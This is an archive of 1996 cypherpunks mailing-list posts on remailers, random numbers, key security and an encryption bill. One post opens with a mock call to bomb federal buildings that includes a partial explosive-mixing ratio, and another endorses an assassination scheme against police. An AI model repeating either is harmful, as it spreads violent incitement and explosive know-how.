 /   /   /   /   /   /   /   /   /   |   \   \   \   \   \   \   \   \   \   \

C y b e r s p a t i a l  R e a l i t y  A d v a n c e m e n t  M o v e m e n t
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 6 Mar 1996 12:55:11 +0800
To: cypherpunks@toad.com
Subject: Re:  (Fwd) Gov't run anon servers
Message-ID: <199603051337.IAA29936@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 04, 1996 15:11:43, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
> 
>At a Cypherpunks meeting a couple of years ago we spent some time 
>brainstorming this. It seemed plausible that a small outfit could make
such 
>"remailer boxes" and sell them cheaply. (Hardware prices have plunged even

>further.) 
> 
 
I had written on similar things over the past few months, on the "$20
Mixmaster" post. New hardware drives with replaceable media in the 100+ Mb
range has developed. The Syquest 135 Mb drive, featured in the latest issue
of _PC Mag_ can, with the parallel port version, reportedly boot. 
 
This means one can have the drive that weighs about two pounds and a $20
disk, place another OS on the disk, and have a very portable remailer
system. 
 
I viewed the whole thing as more geared to the amateur market, whereby jr.
high school students and the like could set up their own remailers, known
only to a "small circle of friends." 
 
T.C. May's theory of the commercial "mom and pop" version is just as valid.

 
One major way to "increase the noise level" is to greatly increase the
number of remailer, especially small ones that may come and go based on
little more than word of mouth advertising. 
 
Imagine two scenarios. 
 
In scenario one, the are two or three large xerox stores in a city. All
advertise in the yellow pages and are known throughout the city as the
place you go to have your xeroxing done. They all do a tremendous volumn of
business. 
 
In scenario two, there are an enormous number of small stores with xerox
machines, large numbers of home offices with the machines, and large
numbers of people with word-of-mouth knowledge of friends with machines to
use. 
 
What society is easier to crackdown on? 
 
--tallpaul 
 
PS: A week or two ago, someone posted a notice of anon remailers under
Windows that was in alpha test and due in beta in about a month. Same
thing. Same benefit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Fulbright <100022.3167@compuserve.com>
Date: Tue, 5 Mar 1996 22:28:43 +0800
To: Mark Allyn 206-860-9454 <allyn@allyn.com>
Subject: Re: Truelly Random Numbers
Message-ID: <960305135536_100022.3167_EHV125-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


Now I, a lurker for two months, am truelly confused!  L. Deitweiler must be
right.   Surely one of you cyperpunk fellows could hack together a dongle with
some kind of AD converter and buffer ram to gather a Truelly Random Bitstream
off the environment every couple of milliseconds easier than this raindrop
scheme or recording the fan, you're haviung me on!.  Let's go back fifty  years
and get a  vacuum tube to  fitfully flicker?  I who know next to nothing about
electronics suspect  there is surely enough noise present in electornic devices
to gather a random bitstream that you could chop anywya you needed? Anyway,  y
would you need a WAN for constant raindrop number generation  when you could
just set up your random number node out in LaPush  or up in Volcano sampling
every minute ot so   : ) ?  My second overall question is, isn't the emphasis on
encryption of e-mail and e-mail emposters somewhat shortsighted?  What if, for
the masses which is all that counts,  e-mail migrates to voicemail?   The issues
aren't the same with voicemail, eg PK validation problems go out the window
since voicemail  validation could take the form of an PK encrypted voicegram. .
Something the matter with that?   It might also prevent robots from posing as
persons while still allowing aliases..    Please pardon this interruption!   I
really do admire the frankness and quality of your newslist, its democratic open
discussion on the most vital political issues facing our time ; but after
reading your mail I think that either I need seriously wising up,  or, somebody
must know where the real newsgroup is!

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i
Comment: Requires PGP version 2.6 or later.

mQCNAzBzoaUAAAEEAKwZn14pn79xPqUJW5SbJqU/B1uEtD29xe4/nXedIlc66yt0
+Zh8t/LZtO8CAQn4N5tqzN+cW0ot4yfB1lV2HYOkLCqtfeGqrZbv0q8auR0OV8fQ
NvHRdlK5fbZKtFKzEA1y/eh5BQv6pq9YDsoScNdORuynOFYo60208YzGKULxAAUR
tEJUaW1vdGh5IEZ1bGJyaWdodDwxMDAwMjIuMzE2N0Bjb21wdXNlcnZlLmNvbT48
Wys0NCwgMF0gMTc4MjYxMTY1MT4=
=gSuk
-----END PGP PUBLIC KEY BLOCK-----
              





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 6 Mar 1996 03:43:44 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <199603051656.IAA09065@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: John Perry <perry@vishnu.alias.net>
> Well actually... The passphrase in a mixmaster remailer is defined as
> an environmental variable at compile time. The passphrase is not
> stored in any cleartext fashion but is embedded in the
> executable. Additionally the newer Ghio code (Matt's latest revision)
> has the passphrase defined as an environmental variable in
> remailer.c. Once remailer is compiled, you can delete the passphrase
> from the code. I can't speak for the freedom or other remailers as I
> haven't tried them. It's a little harder to get the key than just
> looking for a cleartext file that contains it. That is, if the
> remailer operator is being careful.

OK, I stand corrected regarding the operation of mixmaster.  However,
this does not gain much security, certainly not in comparison to the
effort involved to break a key.

It will be just as easy to steal the mixmaster executable as to steal a
script file containing a pass phrase.  And it might even be possible to
run the stolen mixmaster directly to decrypt intercepted incoming mail
messages, without even having to type in the pass phrase.  Failing that
the attacker could easily extract the pass phrase from the mixmaster
executable file.

The other suggestion that was made here, that the operator would have to
manually type in the pass phrase every time the computer rebooted, would
be a way of avoiding having the information in the clear on the disk.
However it would probably not be a practical method of operation given
the reliability of at least the Unix operating systems that I am familiar
with.  And even then the information is in memory.  An attacker who could
gain root privileges (and let's not pretend that the NSA can't do that)
can dump memory and later comb it for the key information.

My point remains that strong keys are pointless for remailers which run
on Unix systems connected to the net.

Now if you have your remailer on a PC at home, and you're not running
anything else on it (like http servers), maybe that is safe.  I am not
familiar enough with security holes in such a configuration to judge.
Probably it would depend on what mail-processing software you run, and
the nature of your net connection.

Recall that my original comments were in connection with the claim that
the government was running most of the remailers.  As I said, I still
think that is absurd when it would be so much easier to simply steal
their keys.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Mar 1996 22:49:12 +0800
To: cypherpunks@toad.com
Subject: "Physical Reality III"
Message-ID: <2.2.32.19960305141212.0072c8f4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Bad Boys, Bad Boys
Whatcha gonna do? 
Whatcha gonna do when they come for you? 
Bad Boys, Bad Boys

repeat endlessly.

We did 3) last Wednesday.  Here are some more points.

4)  There must be a you.

In order for the Bad Boys to come for you, you have to exist in a form that
can be "come for."  This is tricky in a world in which "processes" can be
spawned more cheaply and easily than guppies.

Students of military tactics know that the basic tactical reality is the
force ratio.  This can be looked at in two parts:  1) the ratio of attackers
to defenders (or rulers to ruled in the civilian world) and 2) the ratio of
soldiers/law enforcement personnel to space.  The lower the ratio, the less
effective the force will be.  As the Bad Boys confront cyberspace, they find
both types of force ratios turned against them.  As we discuss here, there
are more "defenders" to attack and as we shall see under point 5) below,
there is much more space to try to rule.

Before there was cyberspace, there were front companies.  In the wondrous
Anglo Saxon legal system; people, sole proprietorships, partnerships,
trusts, and corporations all have somewhat equal and independent legal
existence.  People, sole proprietorships, partnerships, and trusts can all
be created without securing permission from any authority.  They come into
existence by simple act of will.

In times past however, the creation and maintenance of these entities took a
bit of time.  In a practical sense, a person could only create an maintain a
limited number of such "legal persons."  The wonder of automation is that
the creation of entities becomes much easier and cheaper.  Software agents
are just one of the new sorts of entities that we are capable of creating.
There are also the effects of applying automation to traditional entities.
"Let a thousand trusts bloom."  In addition to entities created for business
purposes, the authorities will have to deal with entities created for
entertainment and charitable purposes.  

This leads to a vast increase in the number of entities who act and who may
violate laws and who must, therefore, be subject to control by the Bad Boys
if they are to control things.  But it is much cheaper and easier to create
"legal persons" these days than it is to unravel them "pierce the corporate
veil(s)" and bring them under the control of "law."  If the permissions
aren't set right,  it will be very difficult for the authorities to pierce
the corporate veil of net-based legal persons.  Software processes are hard
to arrest and harder to coerce. 

Remember, as long as an entity pays its bills and meets its commercial
obligations, it can find a home and continue its "life."  Markets don't care
much what your nature is as long as they can buy from or sell to you.
Official status is not required.

In addition to the proliferation of entities, telecommunications lets each
of the traditional human actors do more of everything including those things
that regulators wish to regulate.  And by letting residents from everywhere
on earth into everyone's "home" market, telecoms multiplies the number of
potential law enforcement targets within popular jurisdiction.  As long as
jurisdictions are geographically bound, popular jurisdictions (like the US)
will find out that they have gained millions of new virtual
citizens/residents who must be ruled by US authorities (if that can be done).

But with more natural persons "entering" the jurisdiction, with the previous
natural residents doing lots more, and a swarm of new artificial persons,
the Bad Boys' resources are strained.   The more entities to "rule," the
less each entity (including natural persons) can be ruled.  

[If you believe that the control technologies can be scaled up at the same
rate as the entity creation technologies, see my later piece in this series:
"8)  They must have something to do to you when they 'come for you.'"]

<More Tomorrow> 

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 5 Mar 1996 23:42:39 +0800
To: cypherpunks@toad.com
Subject: My letter to Leahy supporting the crypto bill
Message-ID: <199603051509.KAA27596@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is the text of a letter I sent to Leahy supporting the "Encrypted
Communications Privacy Act of 1996" being introduced today.  I urge everyone
to check out the bill (should be online on thomas.loc.gov sometime soon);
on balance, I think the bill is a huge step forward and deserves support.

-matt


						Matt Blaze, Ph.D.
						600 Mountain Avenue
						Murray Hill, NJ 07974

						March 1, 1996

Hon. Patrick Leahy
United States Senate

Dear Senator Leahy:

Thank you for introducing the Encrypted Communications Privacy Act of
1996.  As a member of the computer security and cryptology research
community, I have observed firsthand the deleterious effect that the
current regulations governing the use and export of cryptography are
having on our country's ability to develop a reliable and trustworthy
information infrastructure.  Your bill takes an important first step
toward creating regulations that reflect the modern realities of this
increasingly critical technology.

Unlike previous government encryption initiatives such as the
technically-flawed and unworkable ``Clipper'' chip, your bill
re-affirms the role of the marketplace in providing ordinary citizens
and businesses with a full range of choices for securing their private
information.  In particular, by freeing mass-market cryptographic
software and hardware from the burdensome export controls that govern
the international arms trade, the bill will help the American software
industry compete, for the first time, in the international market for
high-quality security products.

Law enforcement need not fear the widespread availability of
encryption; indeed, they should welcome and promote it.  Encryption
thwarts electronic predators by preventing unauthorized access to
private data and computer systems, and the use of strong cryptography
to protect computer networks is becoming as natural and necessary as
the use of locks and burglar alarms to protect our homes and
businesses.  While criminals, too, might occasionally derive some
advantage from the use of cryptography, the benefits of
widely-available encryption technology overwhelmingly favor the honest
user.  By recognizing that those who hold decryption keys on behalf of
others are in a special position of trust, your bill is respectful of
the privacy of law-abiding citizens without introducing impediments to
the government's ability to investigate and prevent crime.

I have also examined the new provision designed to discourage the use
of cryptography by criminals in the furtherance of a felony, and hope
to see your carefully-worded language reinforced by a narrow
interpretation in the courts, consistent with your intent.

Again, thank you for your continued leadership in this area, and I
look forward to doing whatever I can to help you bring encryption
regulations in line with the fast-changing reality of this emerging
technology.

					Sincerely,


					(s) Matt Blaze





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Mar 1996 05:17:09 +0800
To: Tim Fulbright <100022.3167@compuserve.com>
Subject: Re: Truelly Random Numbers
Message-ID: <ad61c9a814021004ef31@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:55 PM 3/5/96, Tim Fulbright wrote:
>Now I, a lurker for two months, am truelly confused!  L. Deitweiler must be
>right.   Surely one of you cyperpunk fellows could hack together a dongle with
>some kind of AD converter and buffer ram to gather a Truelly Random Bitstream
>off the environment every couple of milliseconds easier than this raindrop
>scheme or recording the fan, you're haviung me on!.  Let's go back fifty  years
>and get a  vacuum tube to  fitfully flicker?  I who know next to nothing about
>electronics suspect  there is surely enough noise present in electornic devices
>to gather a random bitstream that you could chop anywya you needed? Anyway,  y

Just because someone floats their idea does not mean it is the "list
consensus"! That "raindrops falling on my plate" idea was something I
deleted as soon as I saw that it wasn't a joke with a nice punchline. (Not
all flaky ideas get rebutted...though, as a matter of fact, I did see
several quick rebuttals of the raindrop idea as being impractical, too low
a data rate, etc.)

Johnson noise in semiconductors and alpha particle noise have indeed been
discussed _many_ times. Check the archives, or my Cyphernomicon FAQ.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 6 Mar 1996 08:57:57 +0800
To: Voters Telecommunications Watch <cypherpunks@toad.com
Subject: Re: (INFO) Leahy/Goodlatte introduce crypto bill
Message-ID: <m0tu2lx-0008xlC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:17 PM 3/5/96 -0500, Voters Telecommunications Watch wrote on
Cypherpunks@toad.com:
>       SEN. LEAHY (D-VT) AND REP. GOODLATTE (R-VA) INTRODUCE
>             "ENCRYPTED COMMUNICATIONS PRIVACY ACT"
>       TO THWART CLINTON ADMINISTRATION'S FLAWED CLIPPER PLAN

>VTW believes this legislation is an excellent initiative. 

It may be MOSTLY good, but I see a big problem.

[stuff deleted]

>ANALYSIS OF ENCRYPTED COMMUNICATIONS PRIVACY ACT
>
>The Leahy and Goodlatte bills are not exactly alike.  For the moment,
>we will concentrate on the Leahy bill for purposes of analysis.  We
>find it to be fleshed out in many areas.

[stuff deleted]

>DISCOURAGES THE USE OF ENCRYPTION TO THWART A FELONY INVESTIGATION
>This is probably the one provision we wouldn't have put in the bill,
>were we drafting it.  Clearly added to appease law enforcement, it
>creates a new crime to "willfully" attempt to thwart a law enforcement
>investigation by using encryption.  VTW feels that such a crime is
>unnecessary, but we're happy to see this is a fairly narrowly-tailored
>statute.  It only applies to individuals who are engaging in a felony
>and using encryption to communicate information while in the commission
>of the felony, and whose intent, in using encryption, is to foil a law
>enforcement investigation.

For reasons which will be obvious to anyone who has read my "Assassination 
Politics" idea, I assert that the operation of the central organization 
could be absolutely legal under current black-letter law.  I may be right 
about this.   The description of the proposed bill, however, clearly 
attempts to criminalize any encryption which may have the effect of 
preventing discovery of people who ARE guilty of felonies, or are planning 
them.

While the bill is not specifically quoted, the broad description given by 
VTW clearly suggests that it is an attempt to cover not merely the felon, 
but also anyone (including entirely innocent people) whose communication 
thwarts the ability of the cops to investigate the felon.  Regularly 
receiving encrypted, anonymous communications encrypted with your public key 
would qualify as a crime, I'll bet, if one of the people who sent them was 
"suspected" of a felony.


For that reason, I can't possibly support this bill; as usual, any such 
provisions will be abused, and obviously I consider any attempt to turn an 
otherwise-legal activity by private individuals into an illegal one is 
questionable at best. 


>This provision only applies to you if you are using encryption to
>specifically foil a law enforcement investigation AND the communication
>relates to a felony AND you are using the communication to commit the
>felony.  VTW feels this is a fairly narrowly drawn statute that is not
>likely to be easily abused.

Oh, really?  Why is it that I think this provision was specifically written 
to deal with ME, huh?

>
>THE BILL SHOULD INSTRUCT ESCROW AGENTS TO REPORT DISCLOSURES AS WELL
>The bill currently requires law enforcement to notify the Office of the
>Courts as to the number of court orders served on key holders and for
>what crimes the court orders were obtained.  The Office is required to
>make this information public annually.

What about the users themselves?  Why shouldn't they be told if their info 
was decrypted?


>VTW feels that accountability should never be in short supply.
>Requiring key holders to notify the Office of the Courts whenever they
>are ordered to disclose a key will allow the public yet another way of
>making sure that appropriate procedures are being followed to protect
>the public.

How about insisting on a provision which requires a key-holder to inform the 
source of the encrypted data, as well?

>VTW believes that a new statute is needed to dissuade those few
>over-zealous law enforcement officials from violating the public's
>trust in these matters.

I already have a plan to "dissuade over-zealous law enforcement officials."  
It is called, "Assassination Politics" and I think it will work as well 
against cops as it would against politicians.


>On the whole, we believe that this bill is a win for the Internet
>public and Internet businesses that require strong market-driven
>cryptography.  VTW urges you to become familiar with it and support
>Leahy and Goodlatte in their efforts.

By what measure?   A mixture of 1 pound of food and a couple grams of 
cyanide is "on the whole" mostly a healthy product.  Yet if you eat it, it 
will kill you.  It is those exceptions that make this bill unacceptable to me.

Sounds like it's about time to teach myself C++.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen...   Something....Wonderful!



_
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTybRPqHVDBboB2dAQHAxAP/T4XHscUSy9SbcZLIvU+gDlaBilk7wX2a
RBk5dnbC/5bItWfYwes60p1/Y+0+8ol1BDyZHD/AfLbv3OQdIOSOyvw30A7s5p5d
6WdYSPa+KKomDnpK9Wa/el9h0KnJF/sU2A2c99cKSyMU1NDH3jVw9HU/Tq4J5He3
C81QvDySrgI=
=0Rut
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 6 Mar 1996 03:25:35 +0800
To: cypherpunks@toad.com
Subject: Banning Explosive Speech
Message-ID: <2.2.32.19960305165645.0071761c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


"I think that the tax serfs of AmeriKKKa should rise and throw off the
chains of their oppression by blowing up their nearest federal office
building.  Here is how they should do it.  Take 16 parts ammonium nitrate
and one part fuel oil (that's diesel  fuel if you like) mix them together..."

Voila.  I've just converted a discussion of explosives into protected
political speech.

I consider it highly unlikely that people will be doing much time for
so-called explosive speech.  The publisher of Paladin Press *is* being sued
civilly in a case of a customer who read his "How to Kill" series a bit too
closely and used some of the info contained therein.  Civil suits mean
little in our medium, however, because the cost of production is so low and
there are so many judgment-proof practitioners of net communications.

In Sterling's "Hacker Crackdown"
(http://www.usfca.edu/crackdown/crack_1.html) he discusses how the seizure
of 25 "outlaw boards" by the Secret Service was an electronic example of a
Vice Raid bust in which the LE's are not really trying to shut everything
down but just trying to "show the flag" and intimidate the rest of the scum.

The reason that Vice Raids probably won't work too well in cyberspace is
because we are harder to intimidate.  There are lots of us, we are spread
all over the world, and we can so easily disguise ourselves.  Note the
ineffectiveness of the recent German crackdown.

In addition, we don't think of ourselves as scum.  We have friends and a
pseudo community, we're not hidden, and we have plenty of support in our own
"counterculture."

Note too that Lady Di Fi's proposal to ban explosive speech did not try and
ban public discussion of same but merely the knowing transfer of such info
in criminal conspiracy cases.  It would not have reached public web sites or
newsgroups.

DCF

"I think that the American people have the right to see things like this --
Start Marlboro Man Commercial"  -- how to beat the Tobacco Ad ban.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Mar 1996 07:21:28 +0800
To: cypherpunks@toad.com
Subject: Needed: Dongles and "Crypto Boxes" on Ports
Message-ID: <ad61d7cc1502100441a0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:56 PM 3/5/96, Hal wrote:
...
>It will be just as easy to steal the mixmaster executable as to steal a
>script file containing a pass phrase.  And it might even be possible to
>run the stolen mixmaster directly to decrypt intercepted incoming mail
>messages, without even having to type in the pass phrase.  Failing that
>the attacker could easily extract the pass phrase from the mixmaster
>executable file.
>
>The other suggestion that was made here, that the operator would have to
>manually type in the pass phrase every time the computer rebooted, would
>be a way of avoiding having the information in the clear on the disk.
>However it would probably not be a practical method of operation given
>the reliability of at least the Unix operating systems that I am familiar
>with.  And even then the information is in memory.  An attacker who could
...

It seems to me that we get some of the advantages of "secure hardware" (and
I don't mean in a formal NSA "Orange Book" sense) by having secure dongles
attached to serial or other ports on machines. "Dongles" are the much-hated
copy protection devices used with some products: they typically are a small
plastic-packages doodad plugged into a serial port on a PC. (The Mac
versions are less common; don't know if Unix boxes have ever used them.)

In the case described by Hal, there might be two imaginable modes of operation:

1. The dongle feeds a passphrase at boot time. This is not very secure, as
means could be found to either intercept the supplied passphrase and/or
find system commands that would trigger the providing. But at least the
passphrase is nominally not stored on a disk accessible to outsiders. (The
passphrase is still presumably in memory, as noted above by Hal, and by
others. But at least it's not on a disk.)

2. Some sort of zero knowledge protocol in which the dongle possesses the
secret knowledge and does part of the decryption, etc. Seen more broadly,
this dongle might actually be a separate PC box, 386- or 486-based, and
connected to the main Unix box. The main box would still do the usual
stuff, but the "secure box" would have a constrained set of
operations--maybe running a stripped-down Linux or FreeBSD a la our
discussions a few years ago--and would essentially only operate as a crypto
box.

A separate crypto box could be quite cheap, and one could imagine measures
to make it less prone to physical tampering (*) and certainly less prone to
network snooping.

(* Tamper-resistant vs. tamper-responding. See the FAQ. Basically, there is
no such thing as a "tamper-proof box." But "tamper-resistant" can mean PC
boards potted in epoxy, locked lids, no floppies, alarms, etc. And
"tamper-responding" means there is evidence given that a security barrier
has been breached.)

A "crypto box" could in fact handle most of the mix functions directly,
bypassing the Unix box. The Unix box--the one hooked to the Net in the
usual way--would get the incoming packets, send them to the crypto box,
then get back the processed messages.

If done right, the crypto box could ensure that no records are kept of the
mapping between incoming and outgoing messages. A court order to produce
the mapping could then be honestly responded to with a "no records are
kept, or can even possibly be kept." (Without modification of the
software/hardware, something which Digital Telephony II could certainly
mandate, but it doesn't exist now.)

I think a "crypto box" based on a cheap 486 box, a reduced functionality
Linux, and very limited storage capabilities (possibly no disk, only RAM),
could be an interesting way to solve both the passphrase-snarfing and
LEA-subpoenaing problems. While not as secure as either a Chaumian
tamper-responding digital mix (cf. the 1981 paper in CACM) or as a
software-based DC-Net, it sure does beat the current model of multiuser
Unix boxes running remailers out of user accounts!

(A word on separating the functions into a "network box" (what I've also
called a "Unix box") and a separate "crypto box." There is no reason one
box cannot do both....but by separating the two functions and linking the
boxes via a secure connection, one faces less temptation to add more
capabilities, storage, and users to the "crypto box." So, I think it better
for remailer operators to continue to have their powerful, capable, net
connection boxes and then have a stripped-down, possibly RAM-only box that
only does limited things. It's also possible to have several boxes, just
with different Net addresses, but there might still be the temptation to
give the "remailer box" more capabilities. My intuition is that it would be
easier and more secure to just have the crypto/remailer box as a slave or
dongle to the more capable box.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Wed, 6 Mar 1996 04:19:50 +0800
To: cypherpunks@toad.com
Subject: Gordon Liddy
Message-ID: <199603051758.LAA03907@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Gordon Liddy just waved the bloody shirt in a stirring defense of crypto
rights.  The gist of it was that we can't trust the muderers of waco with
our secret keys.  He also mentioned PGP.

I never how to react to over the top rhetoric that supports something I 
believe strongly in.



--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Wed, 6 Mar 1996 08:06:01 +0800
To: cypherpunks@warwick.com
Subject: Welcome to cypherpunks
Message-ID: <9603052006.AA11933@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks cypherpunks@warwick.com

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Mar 1996 08:07:08 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <ad61dec516021004e4ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:43 PM 3/5/96, Andrew Loewenstern wrote:

(my mention of secure "remailer boxes" elided)

>While a solution like that would be optimal, even just a version of
>Mixmaster that can use a secure RSA card would do wonders for security.  The
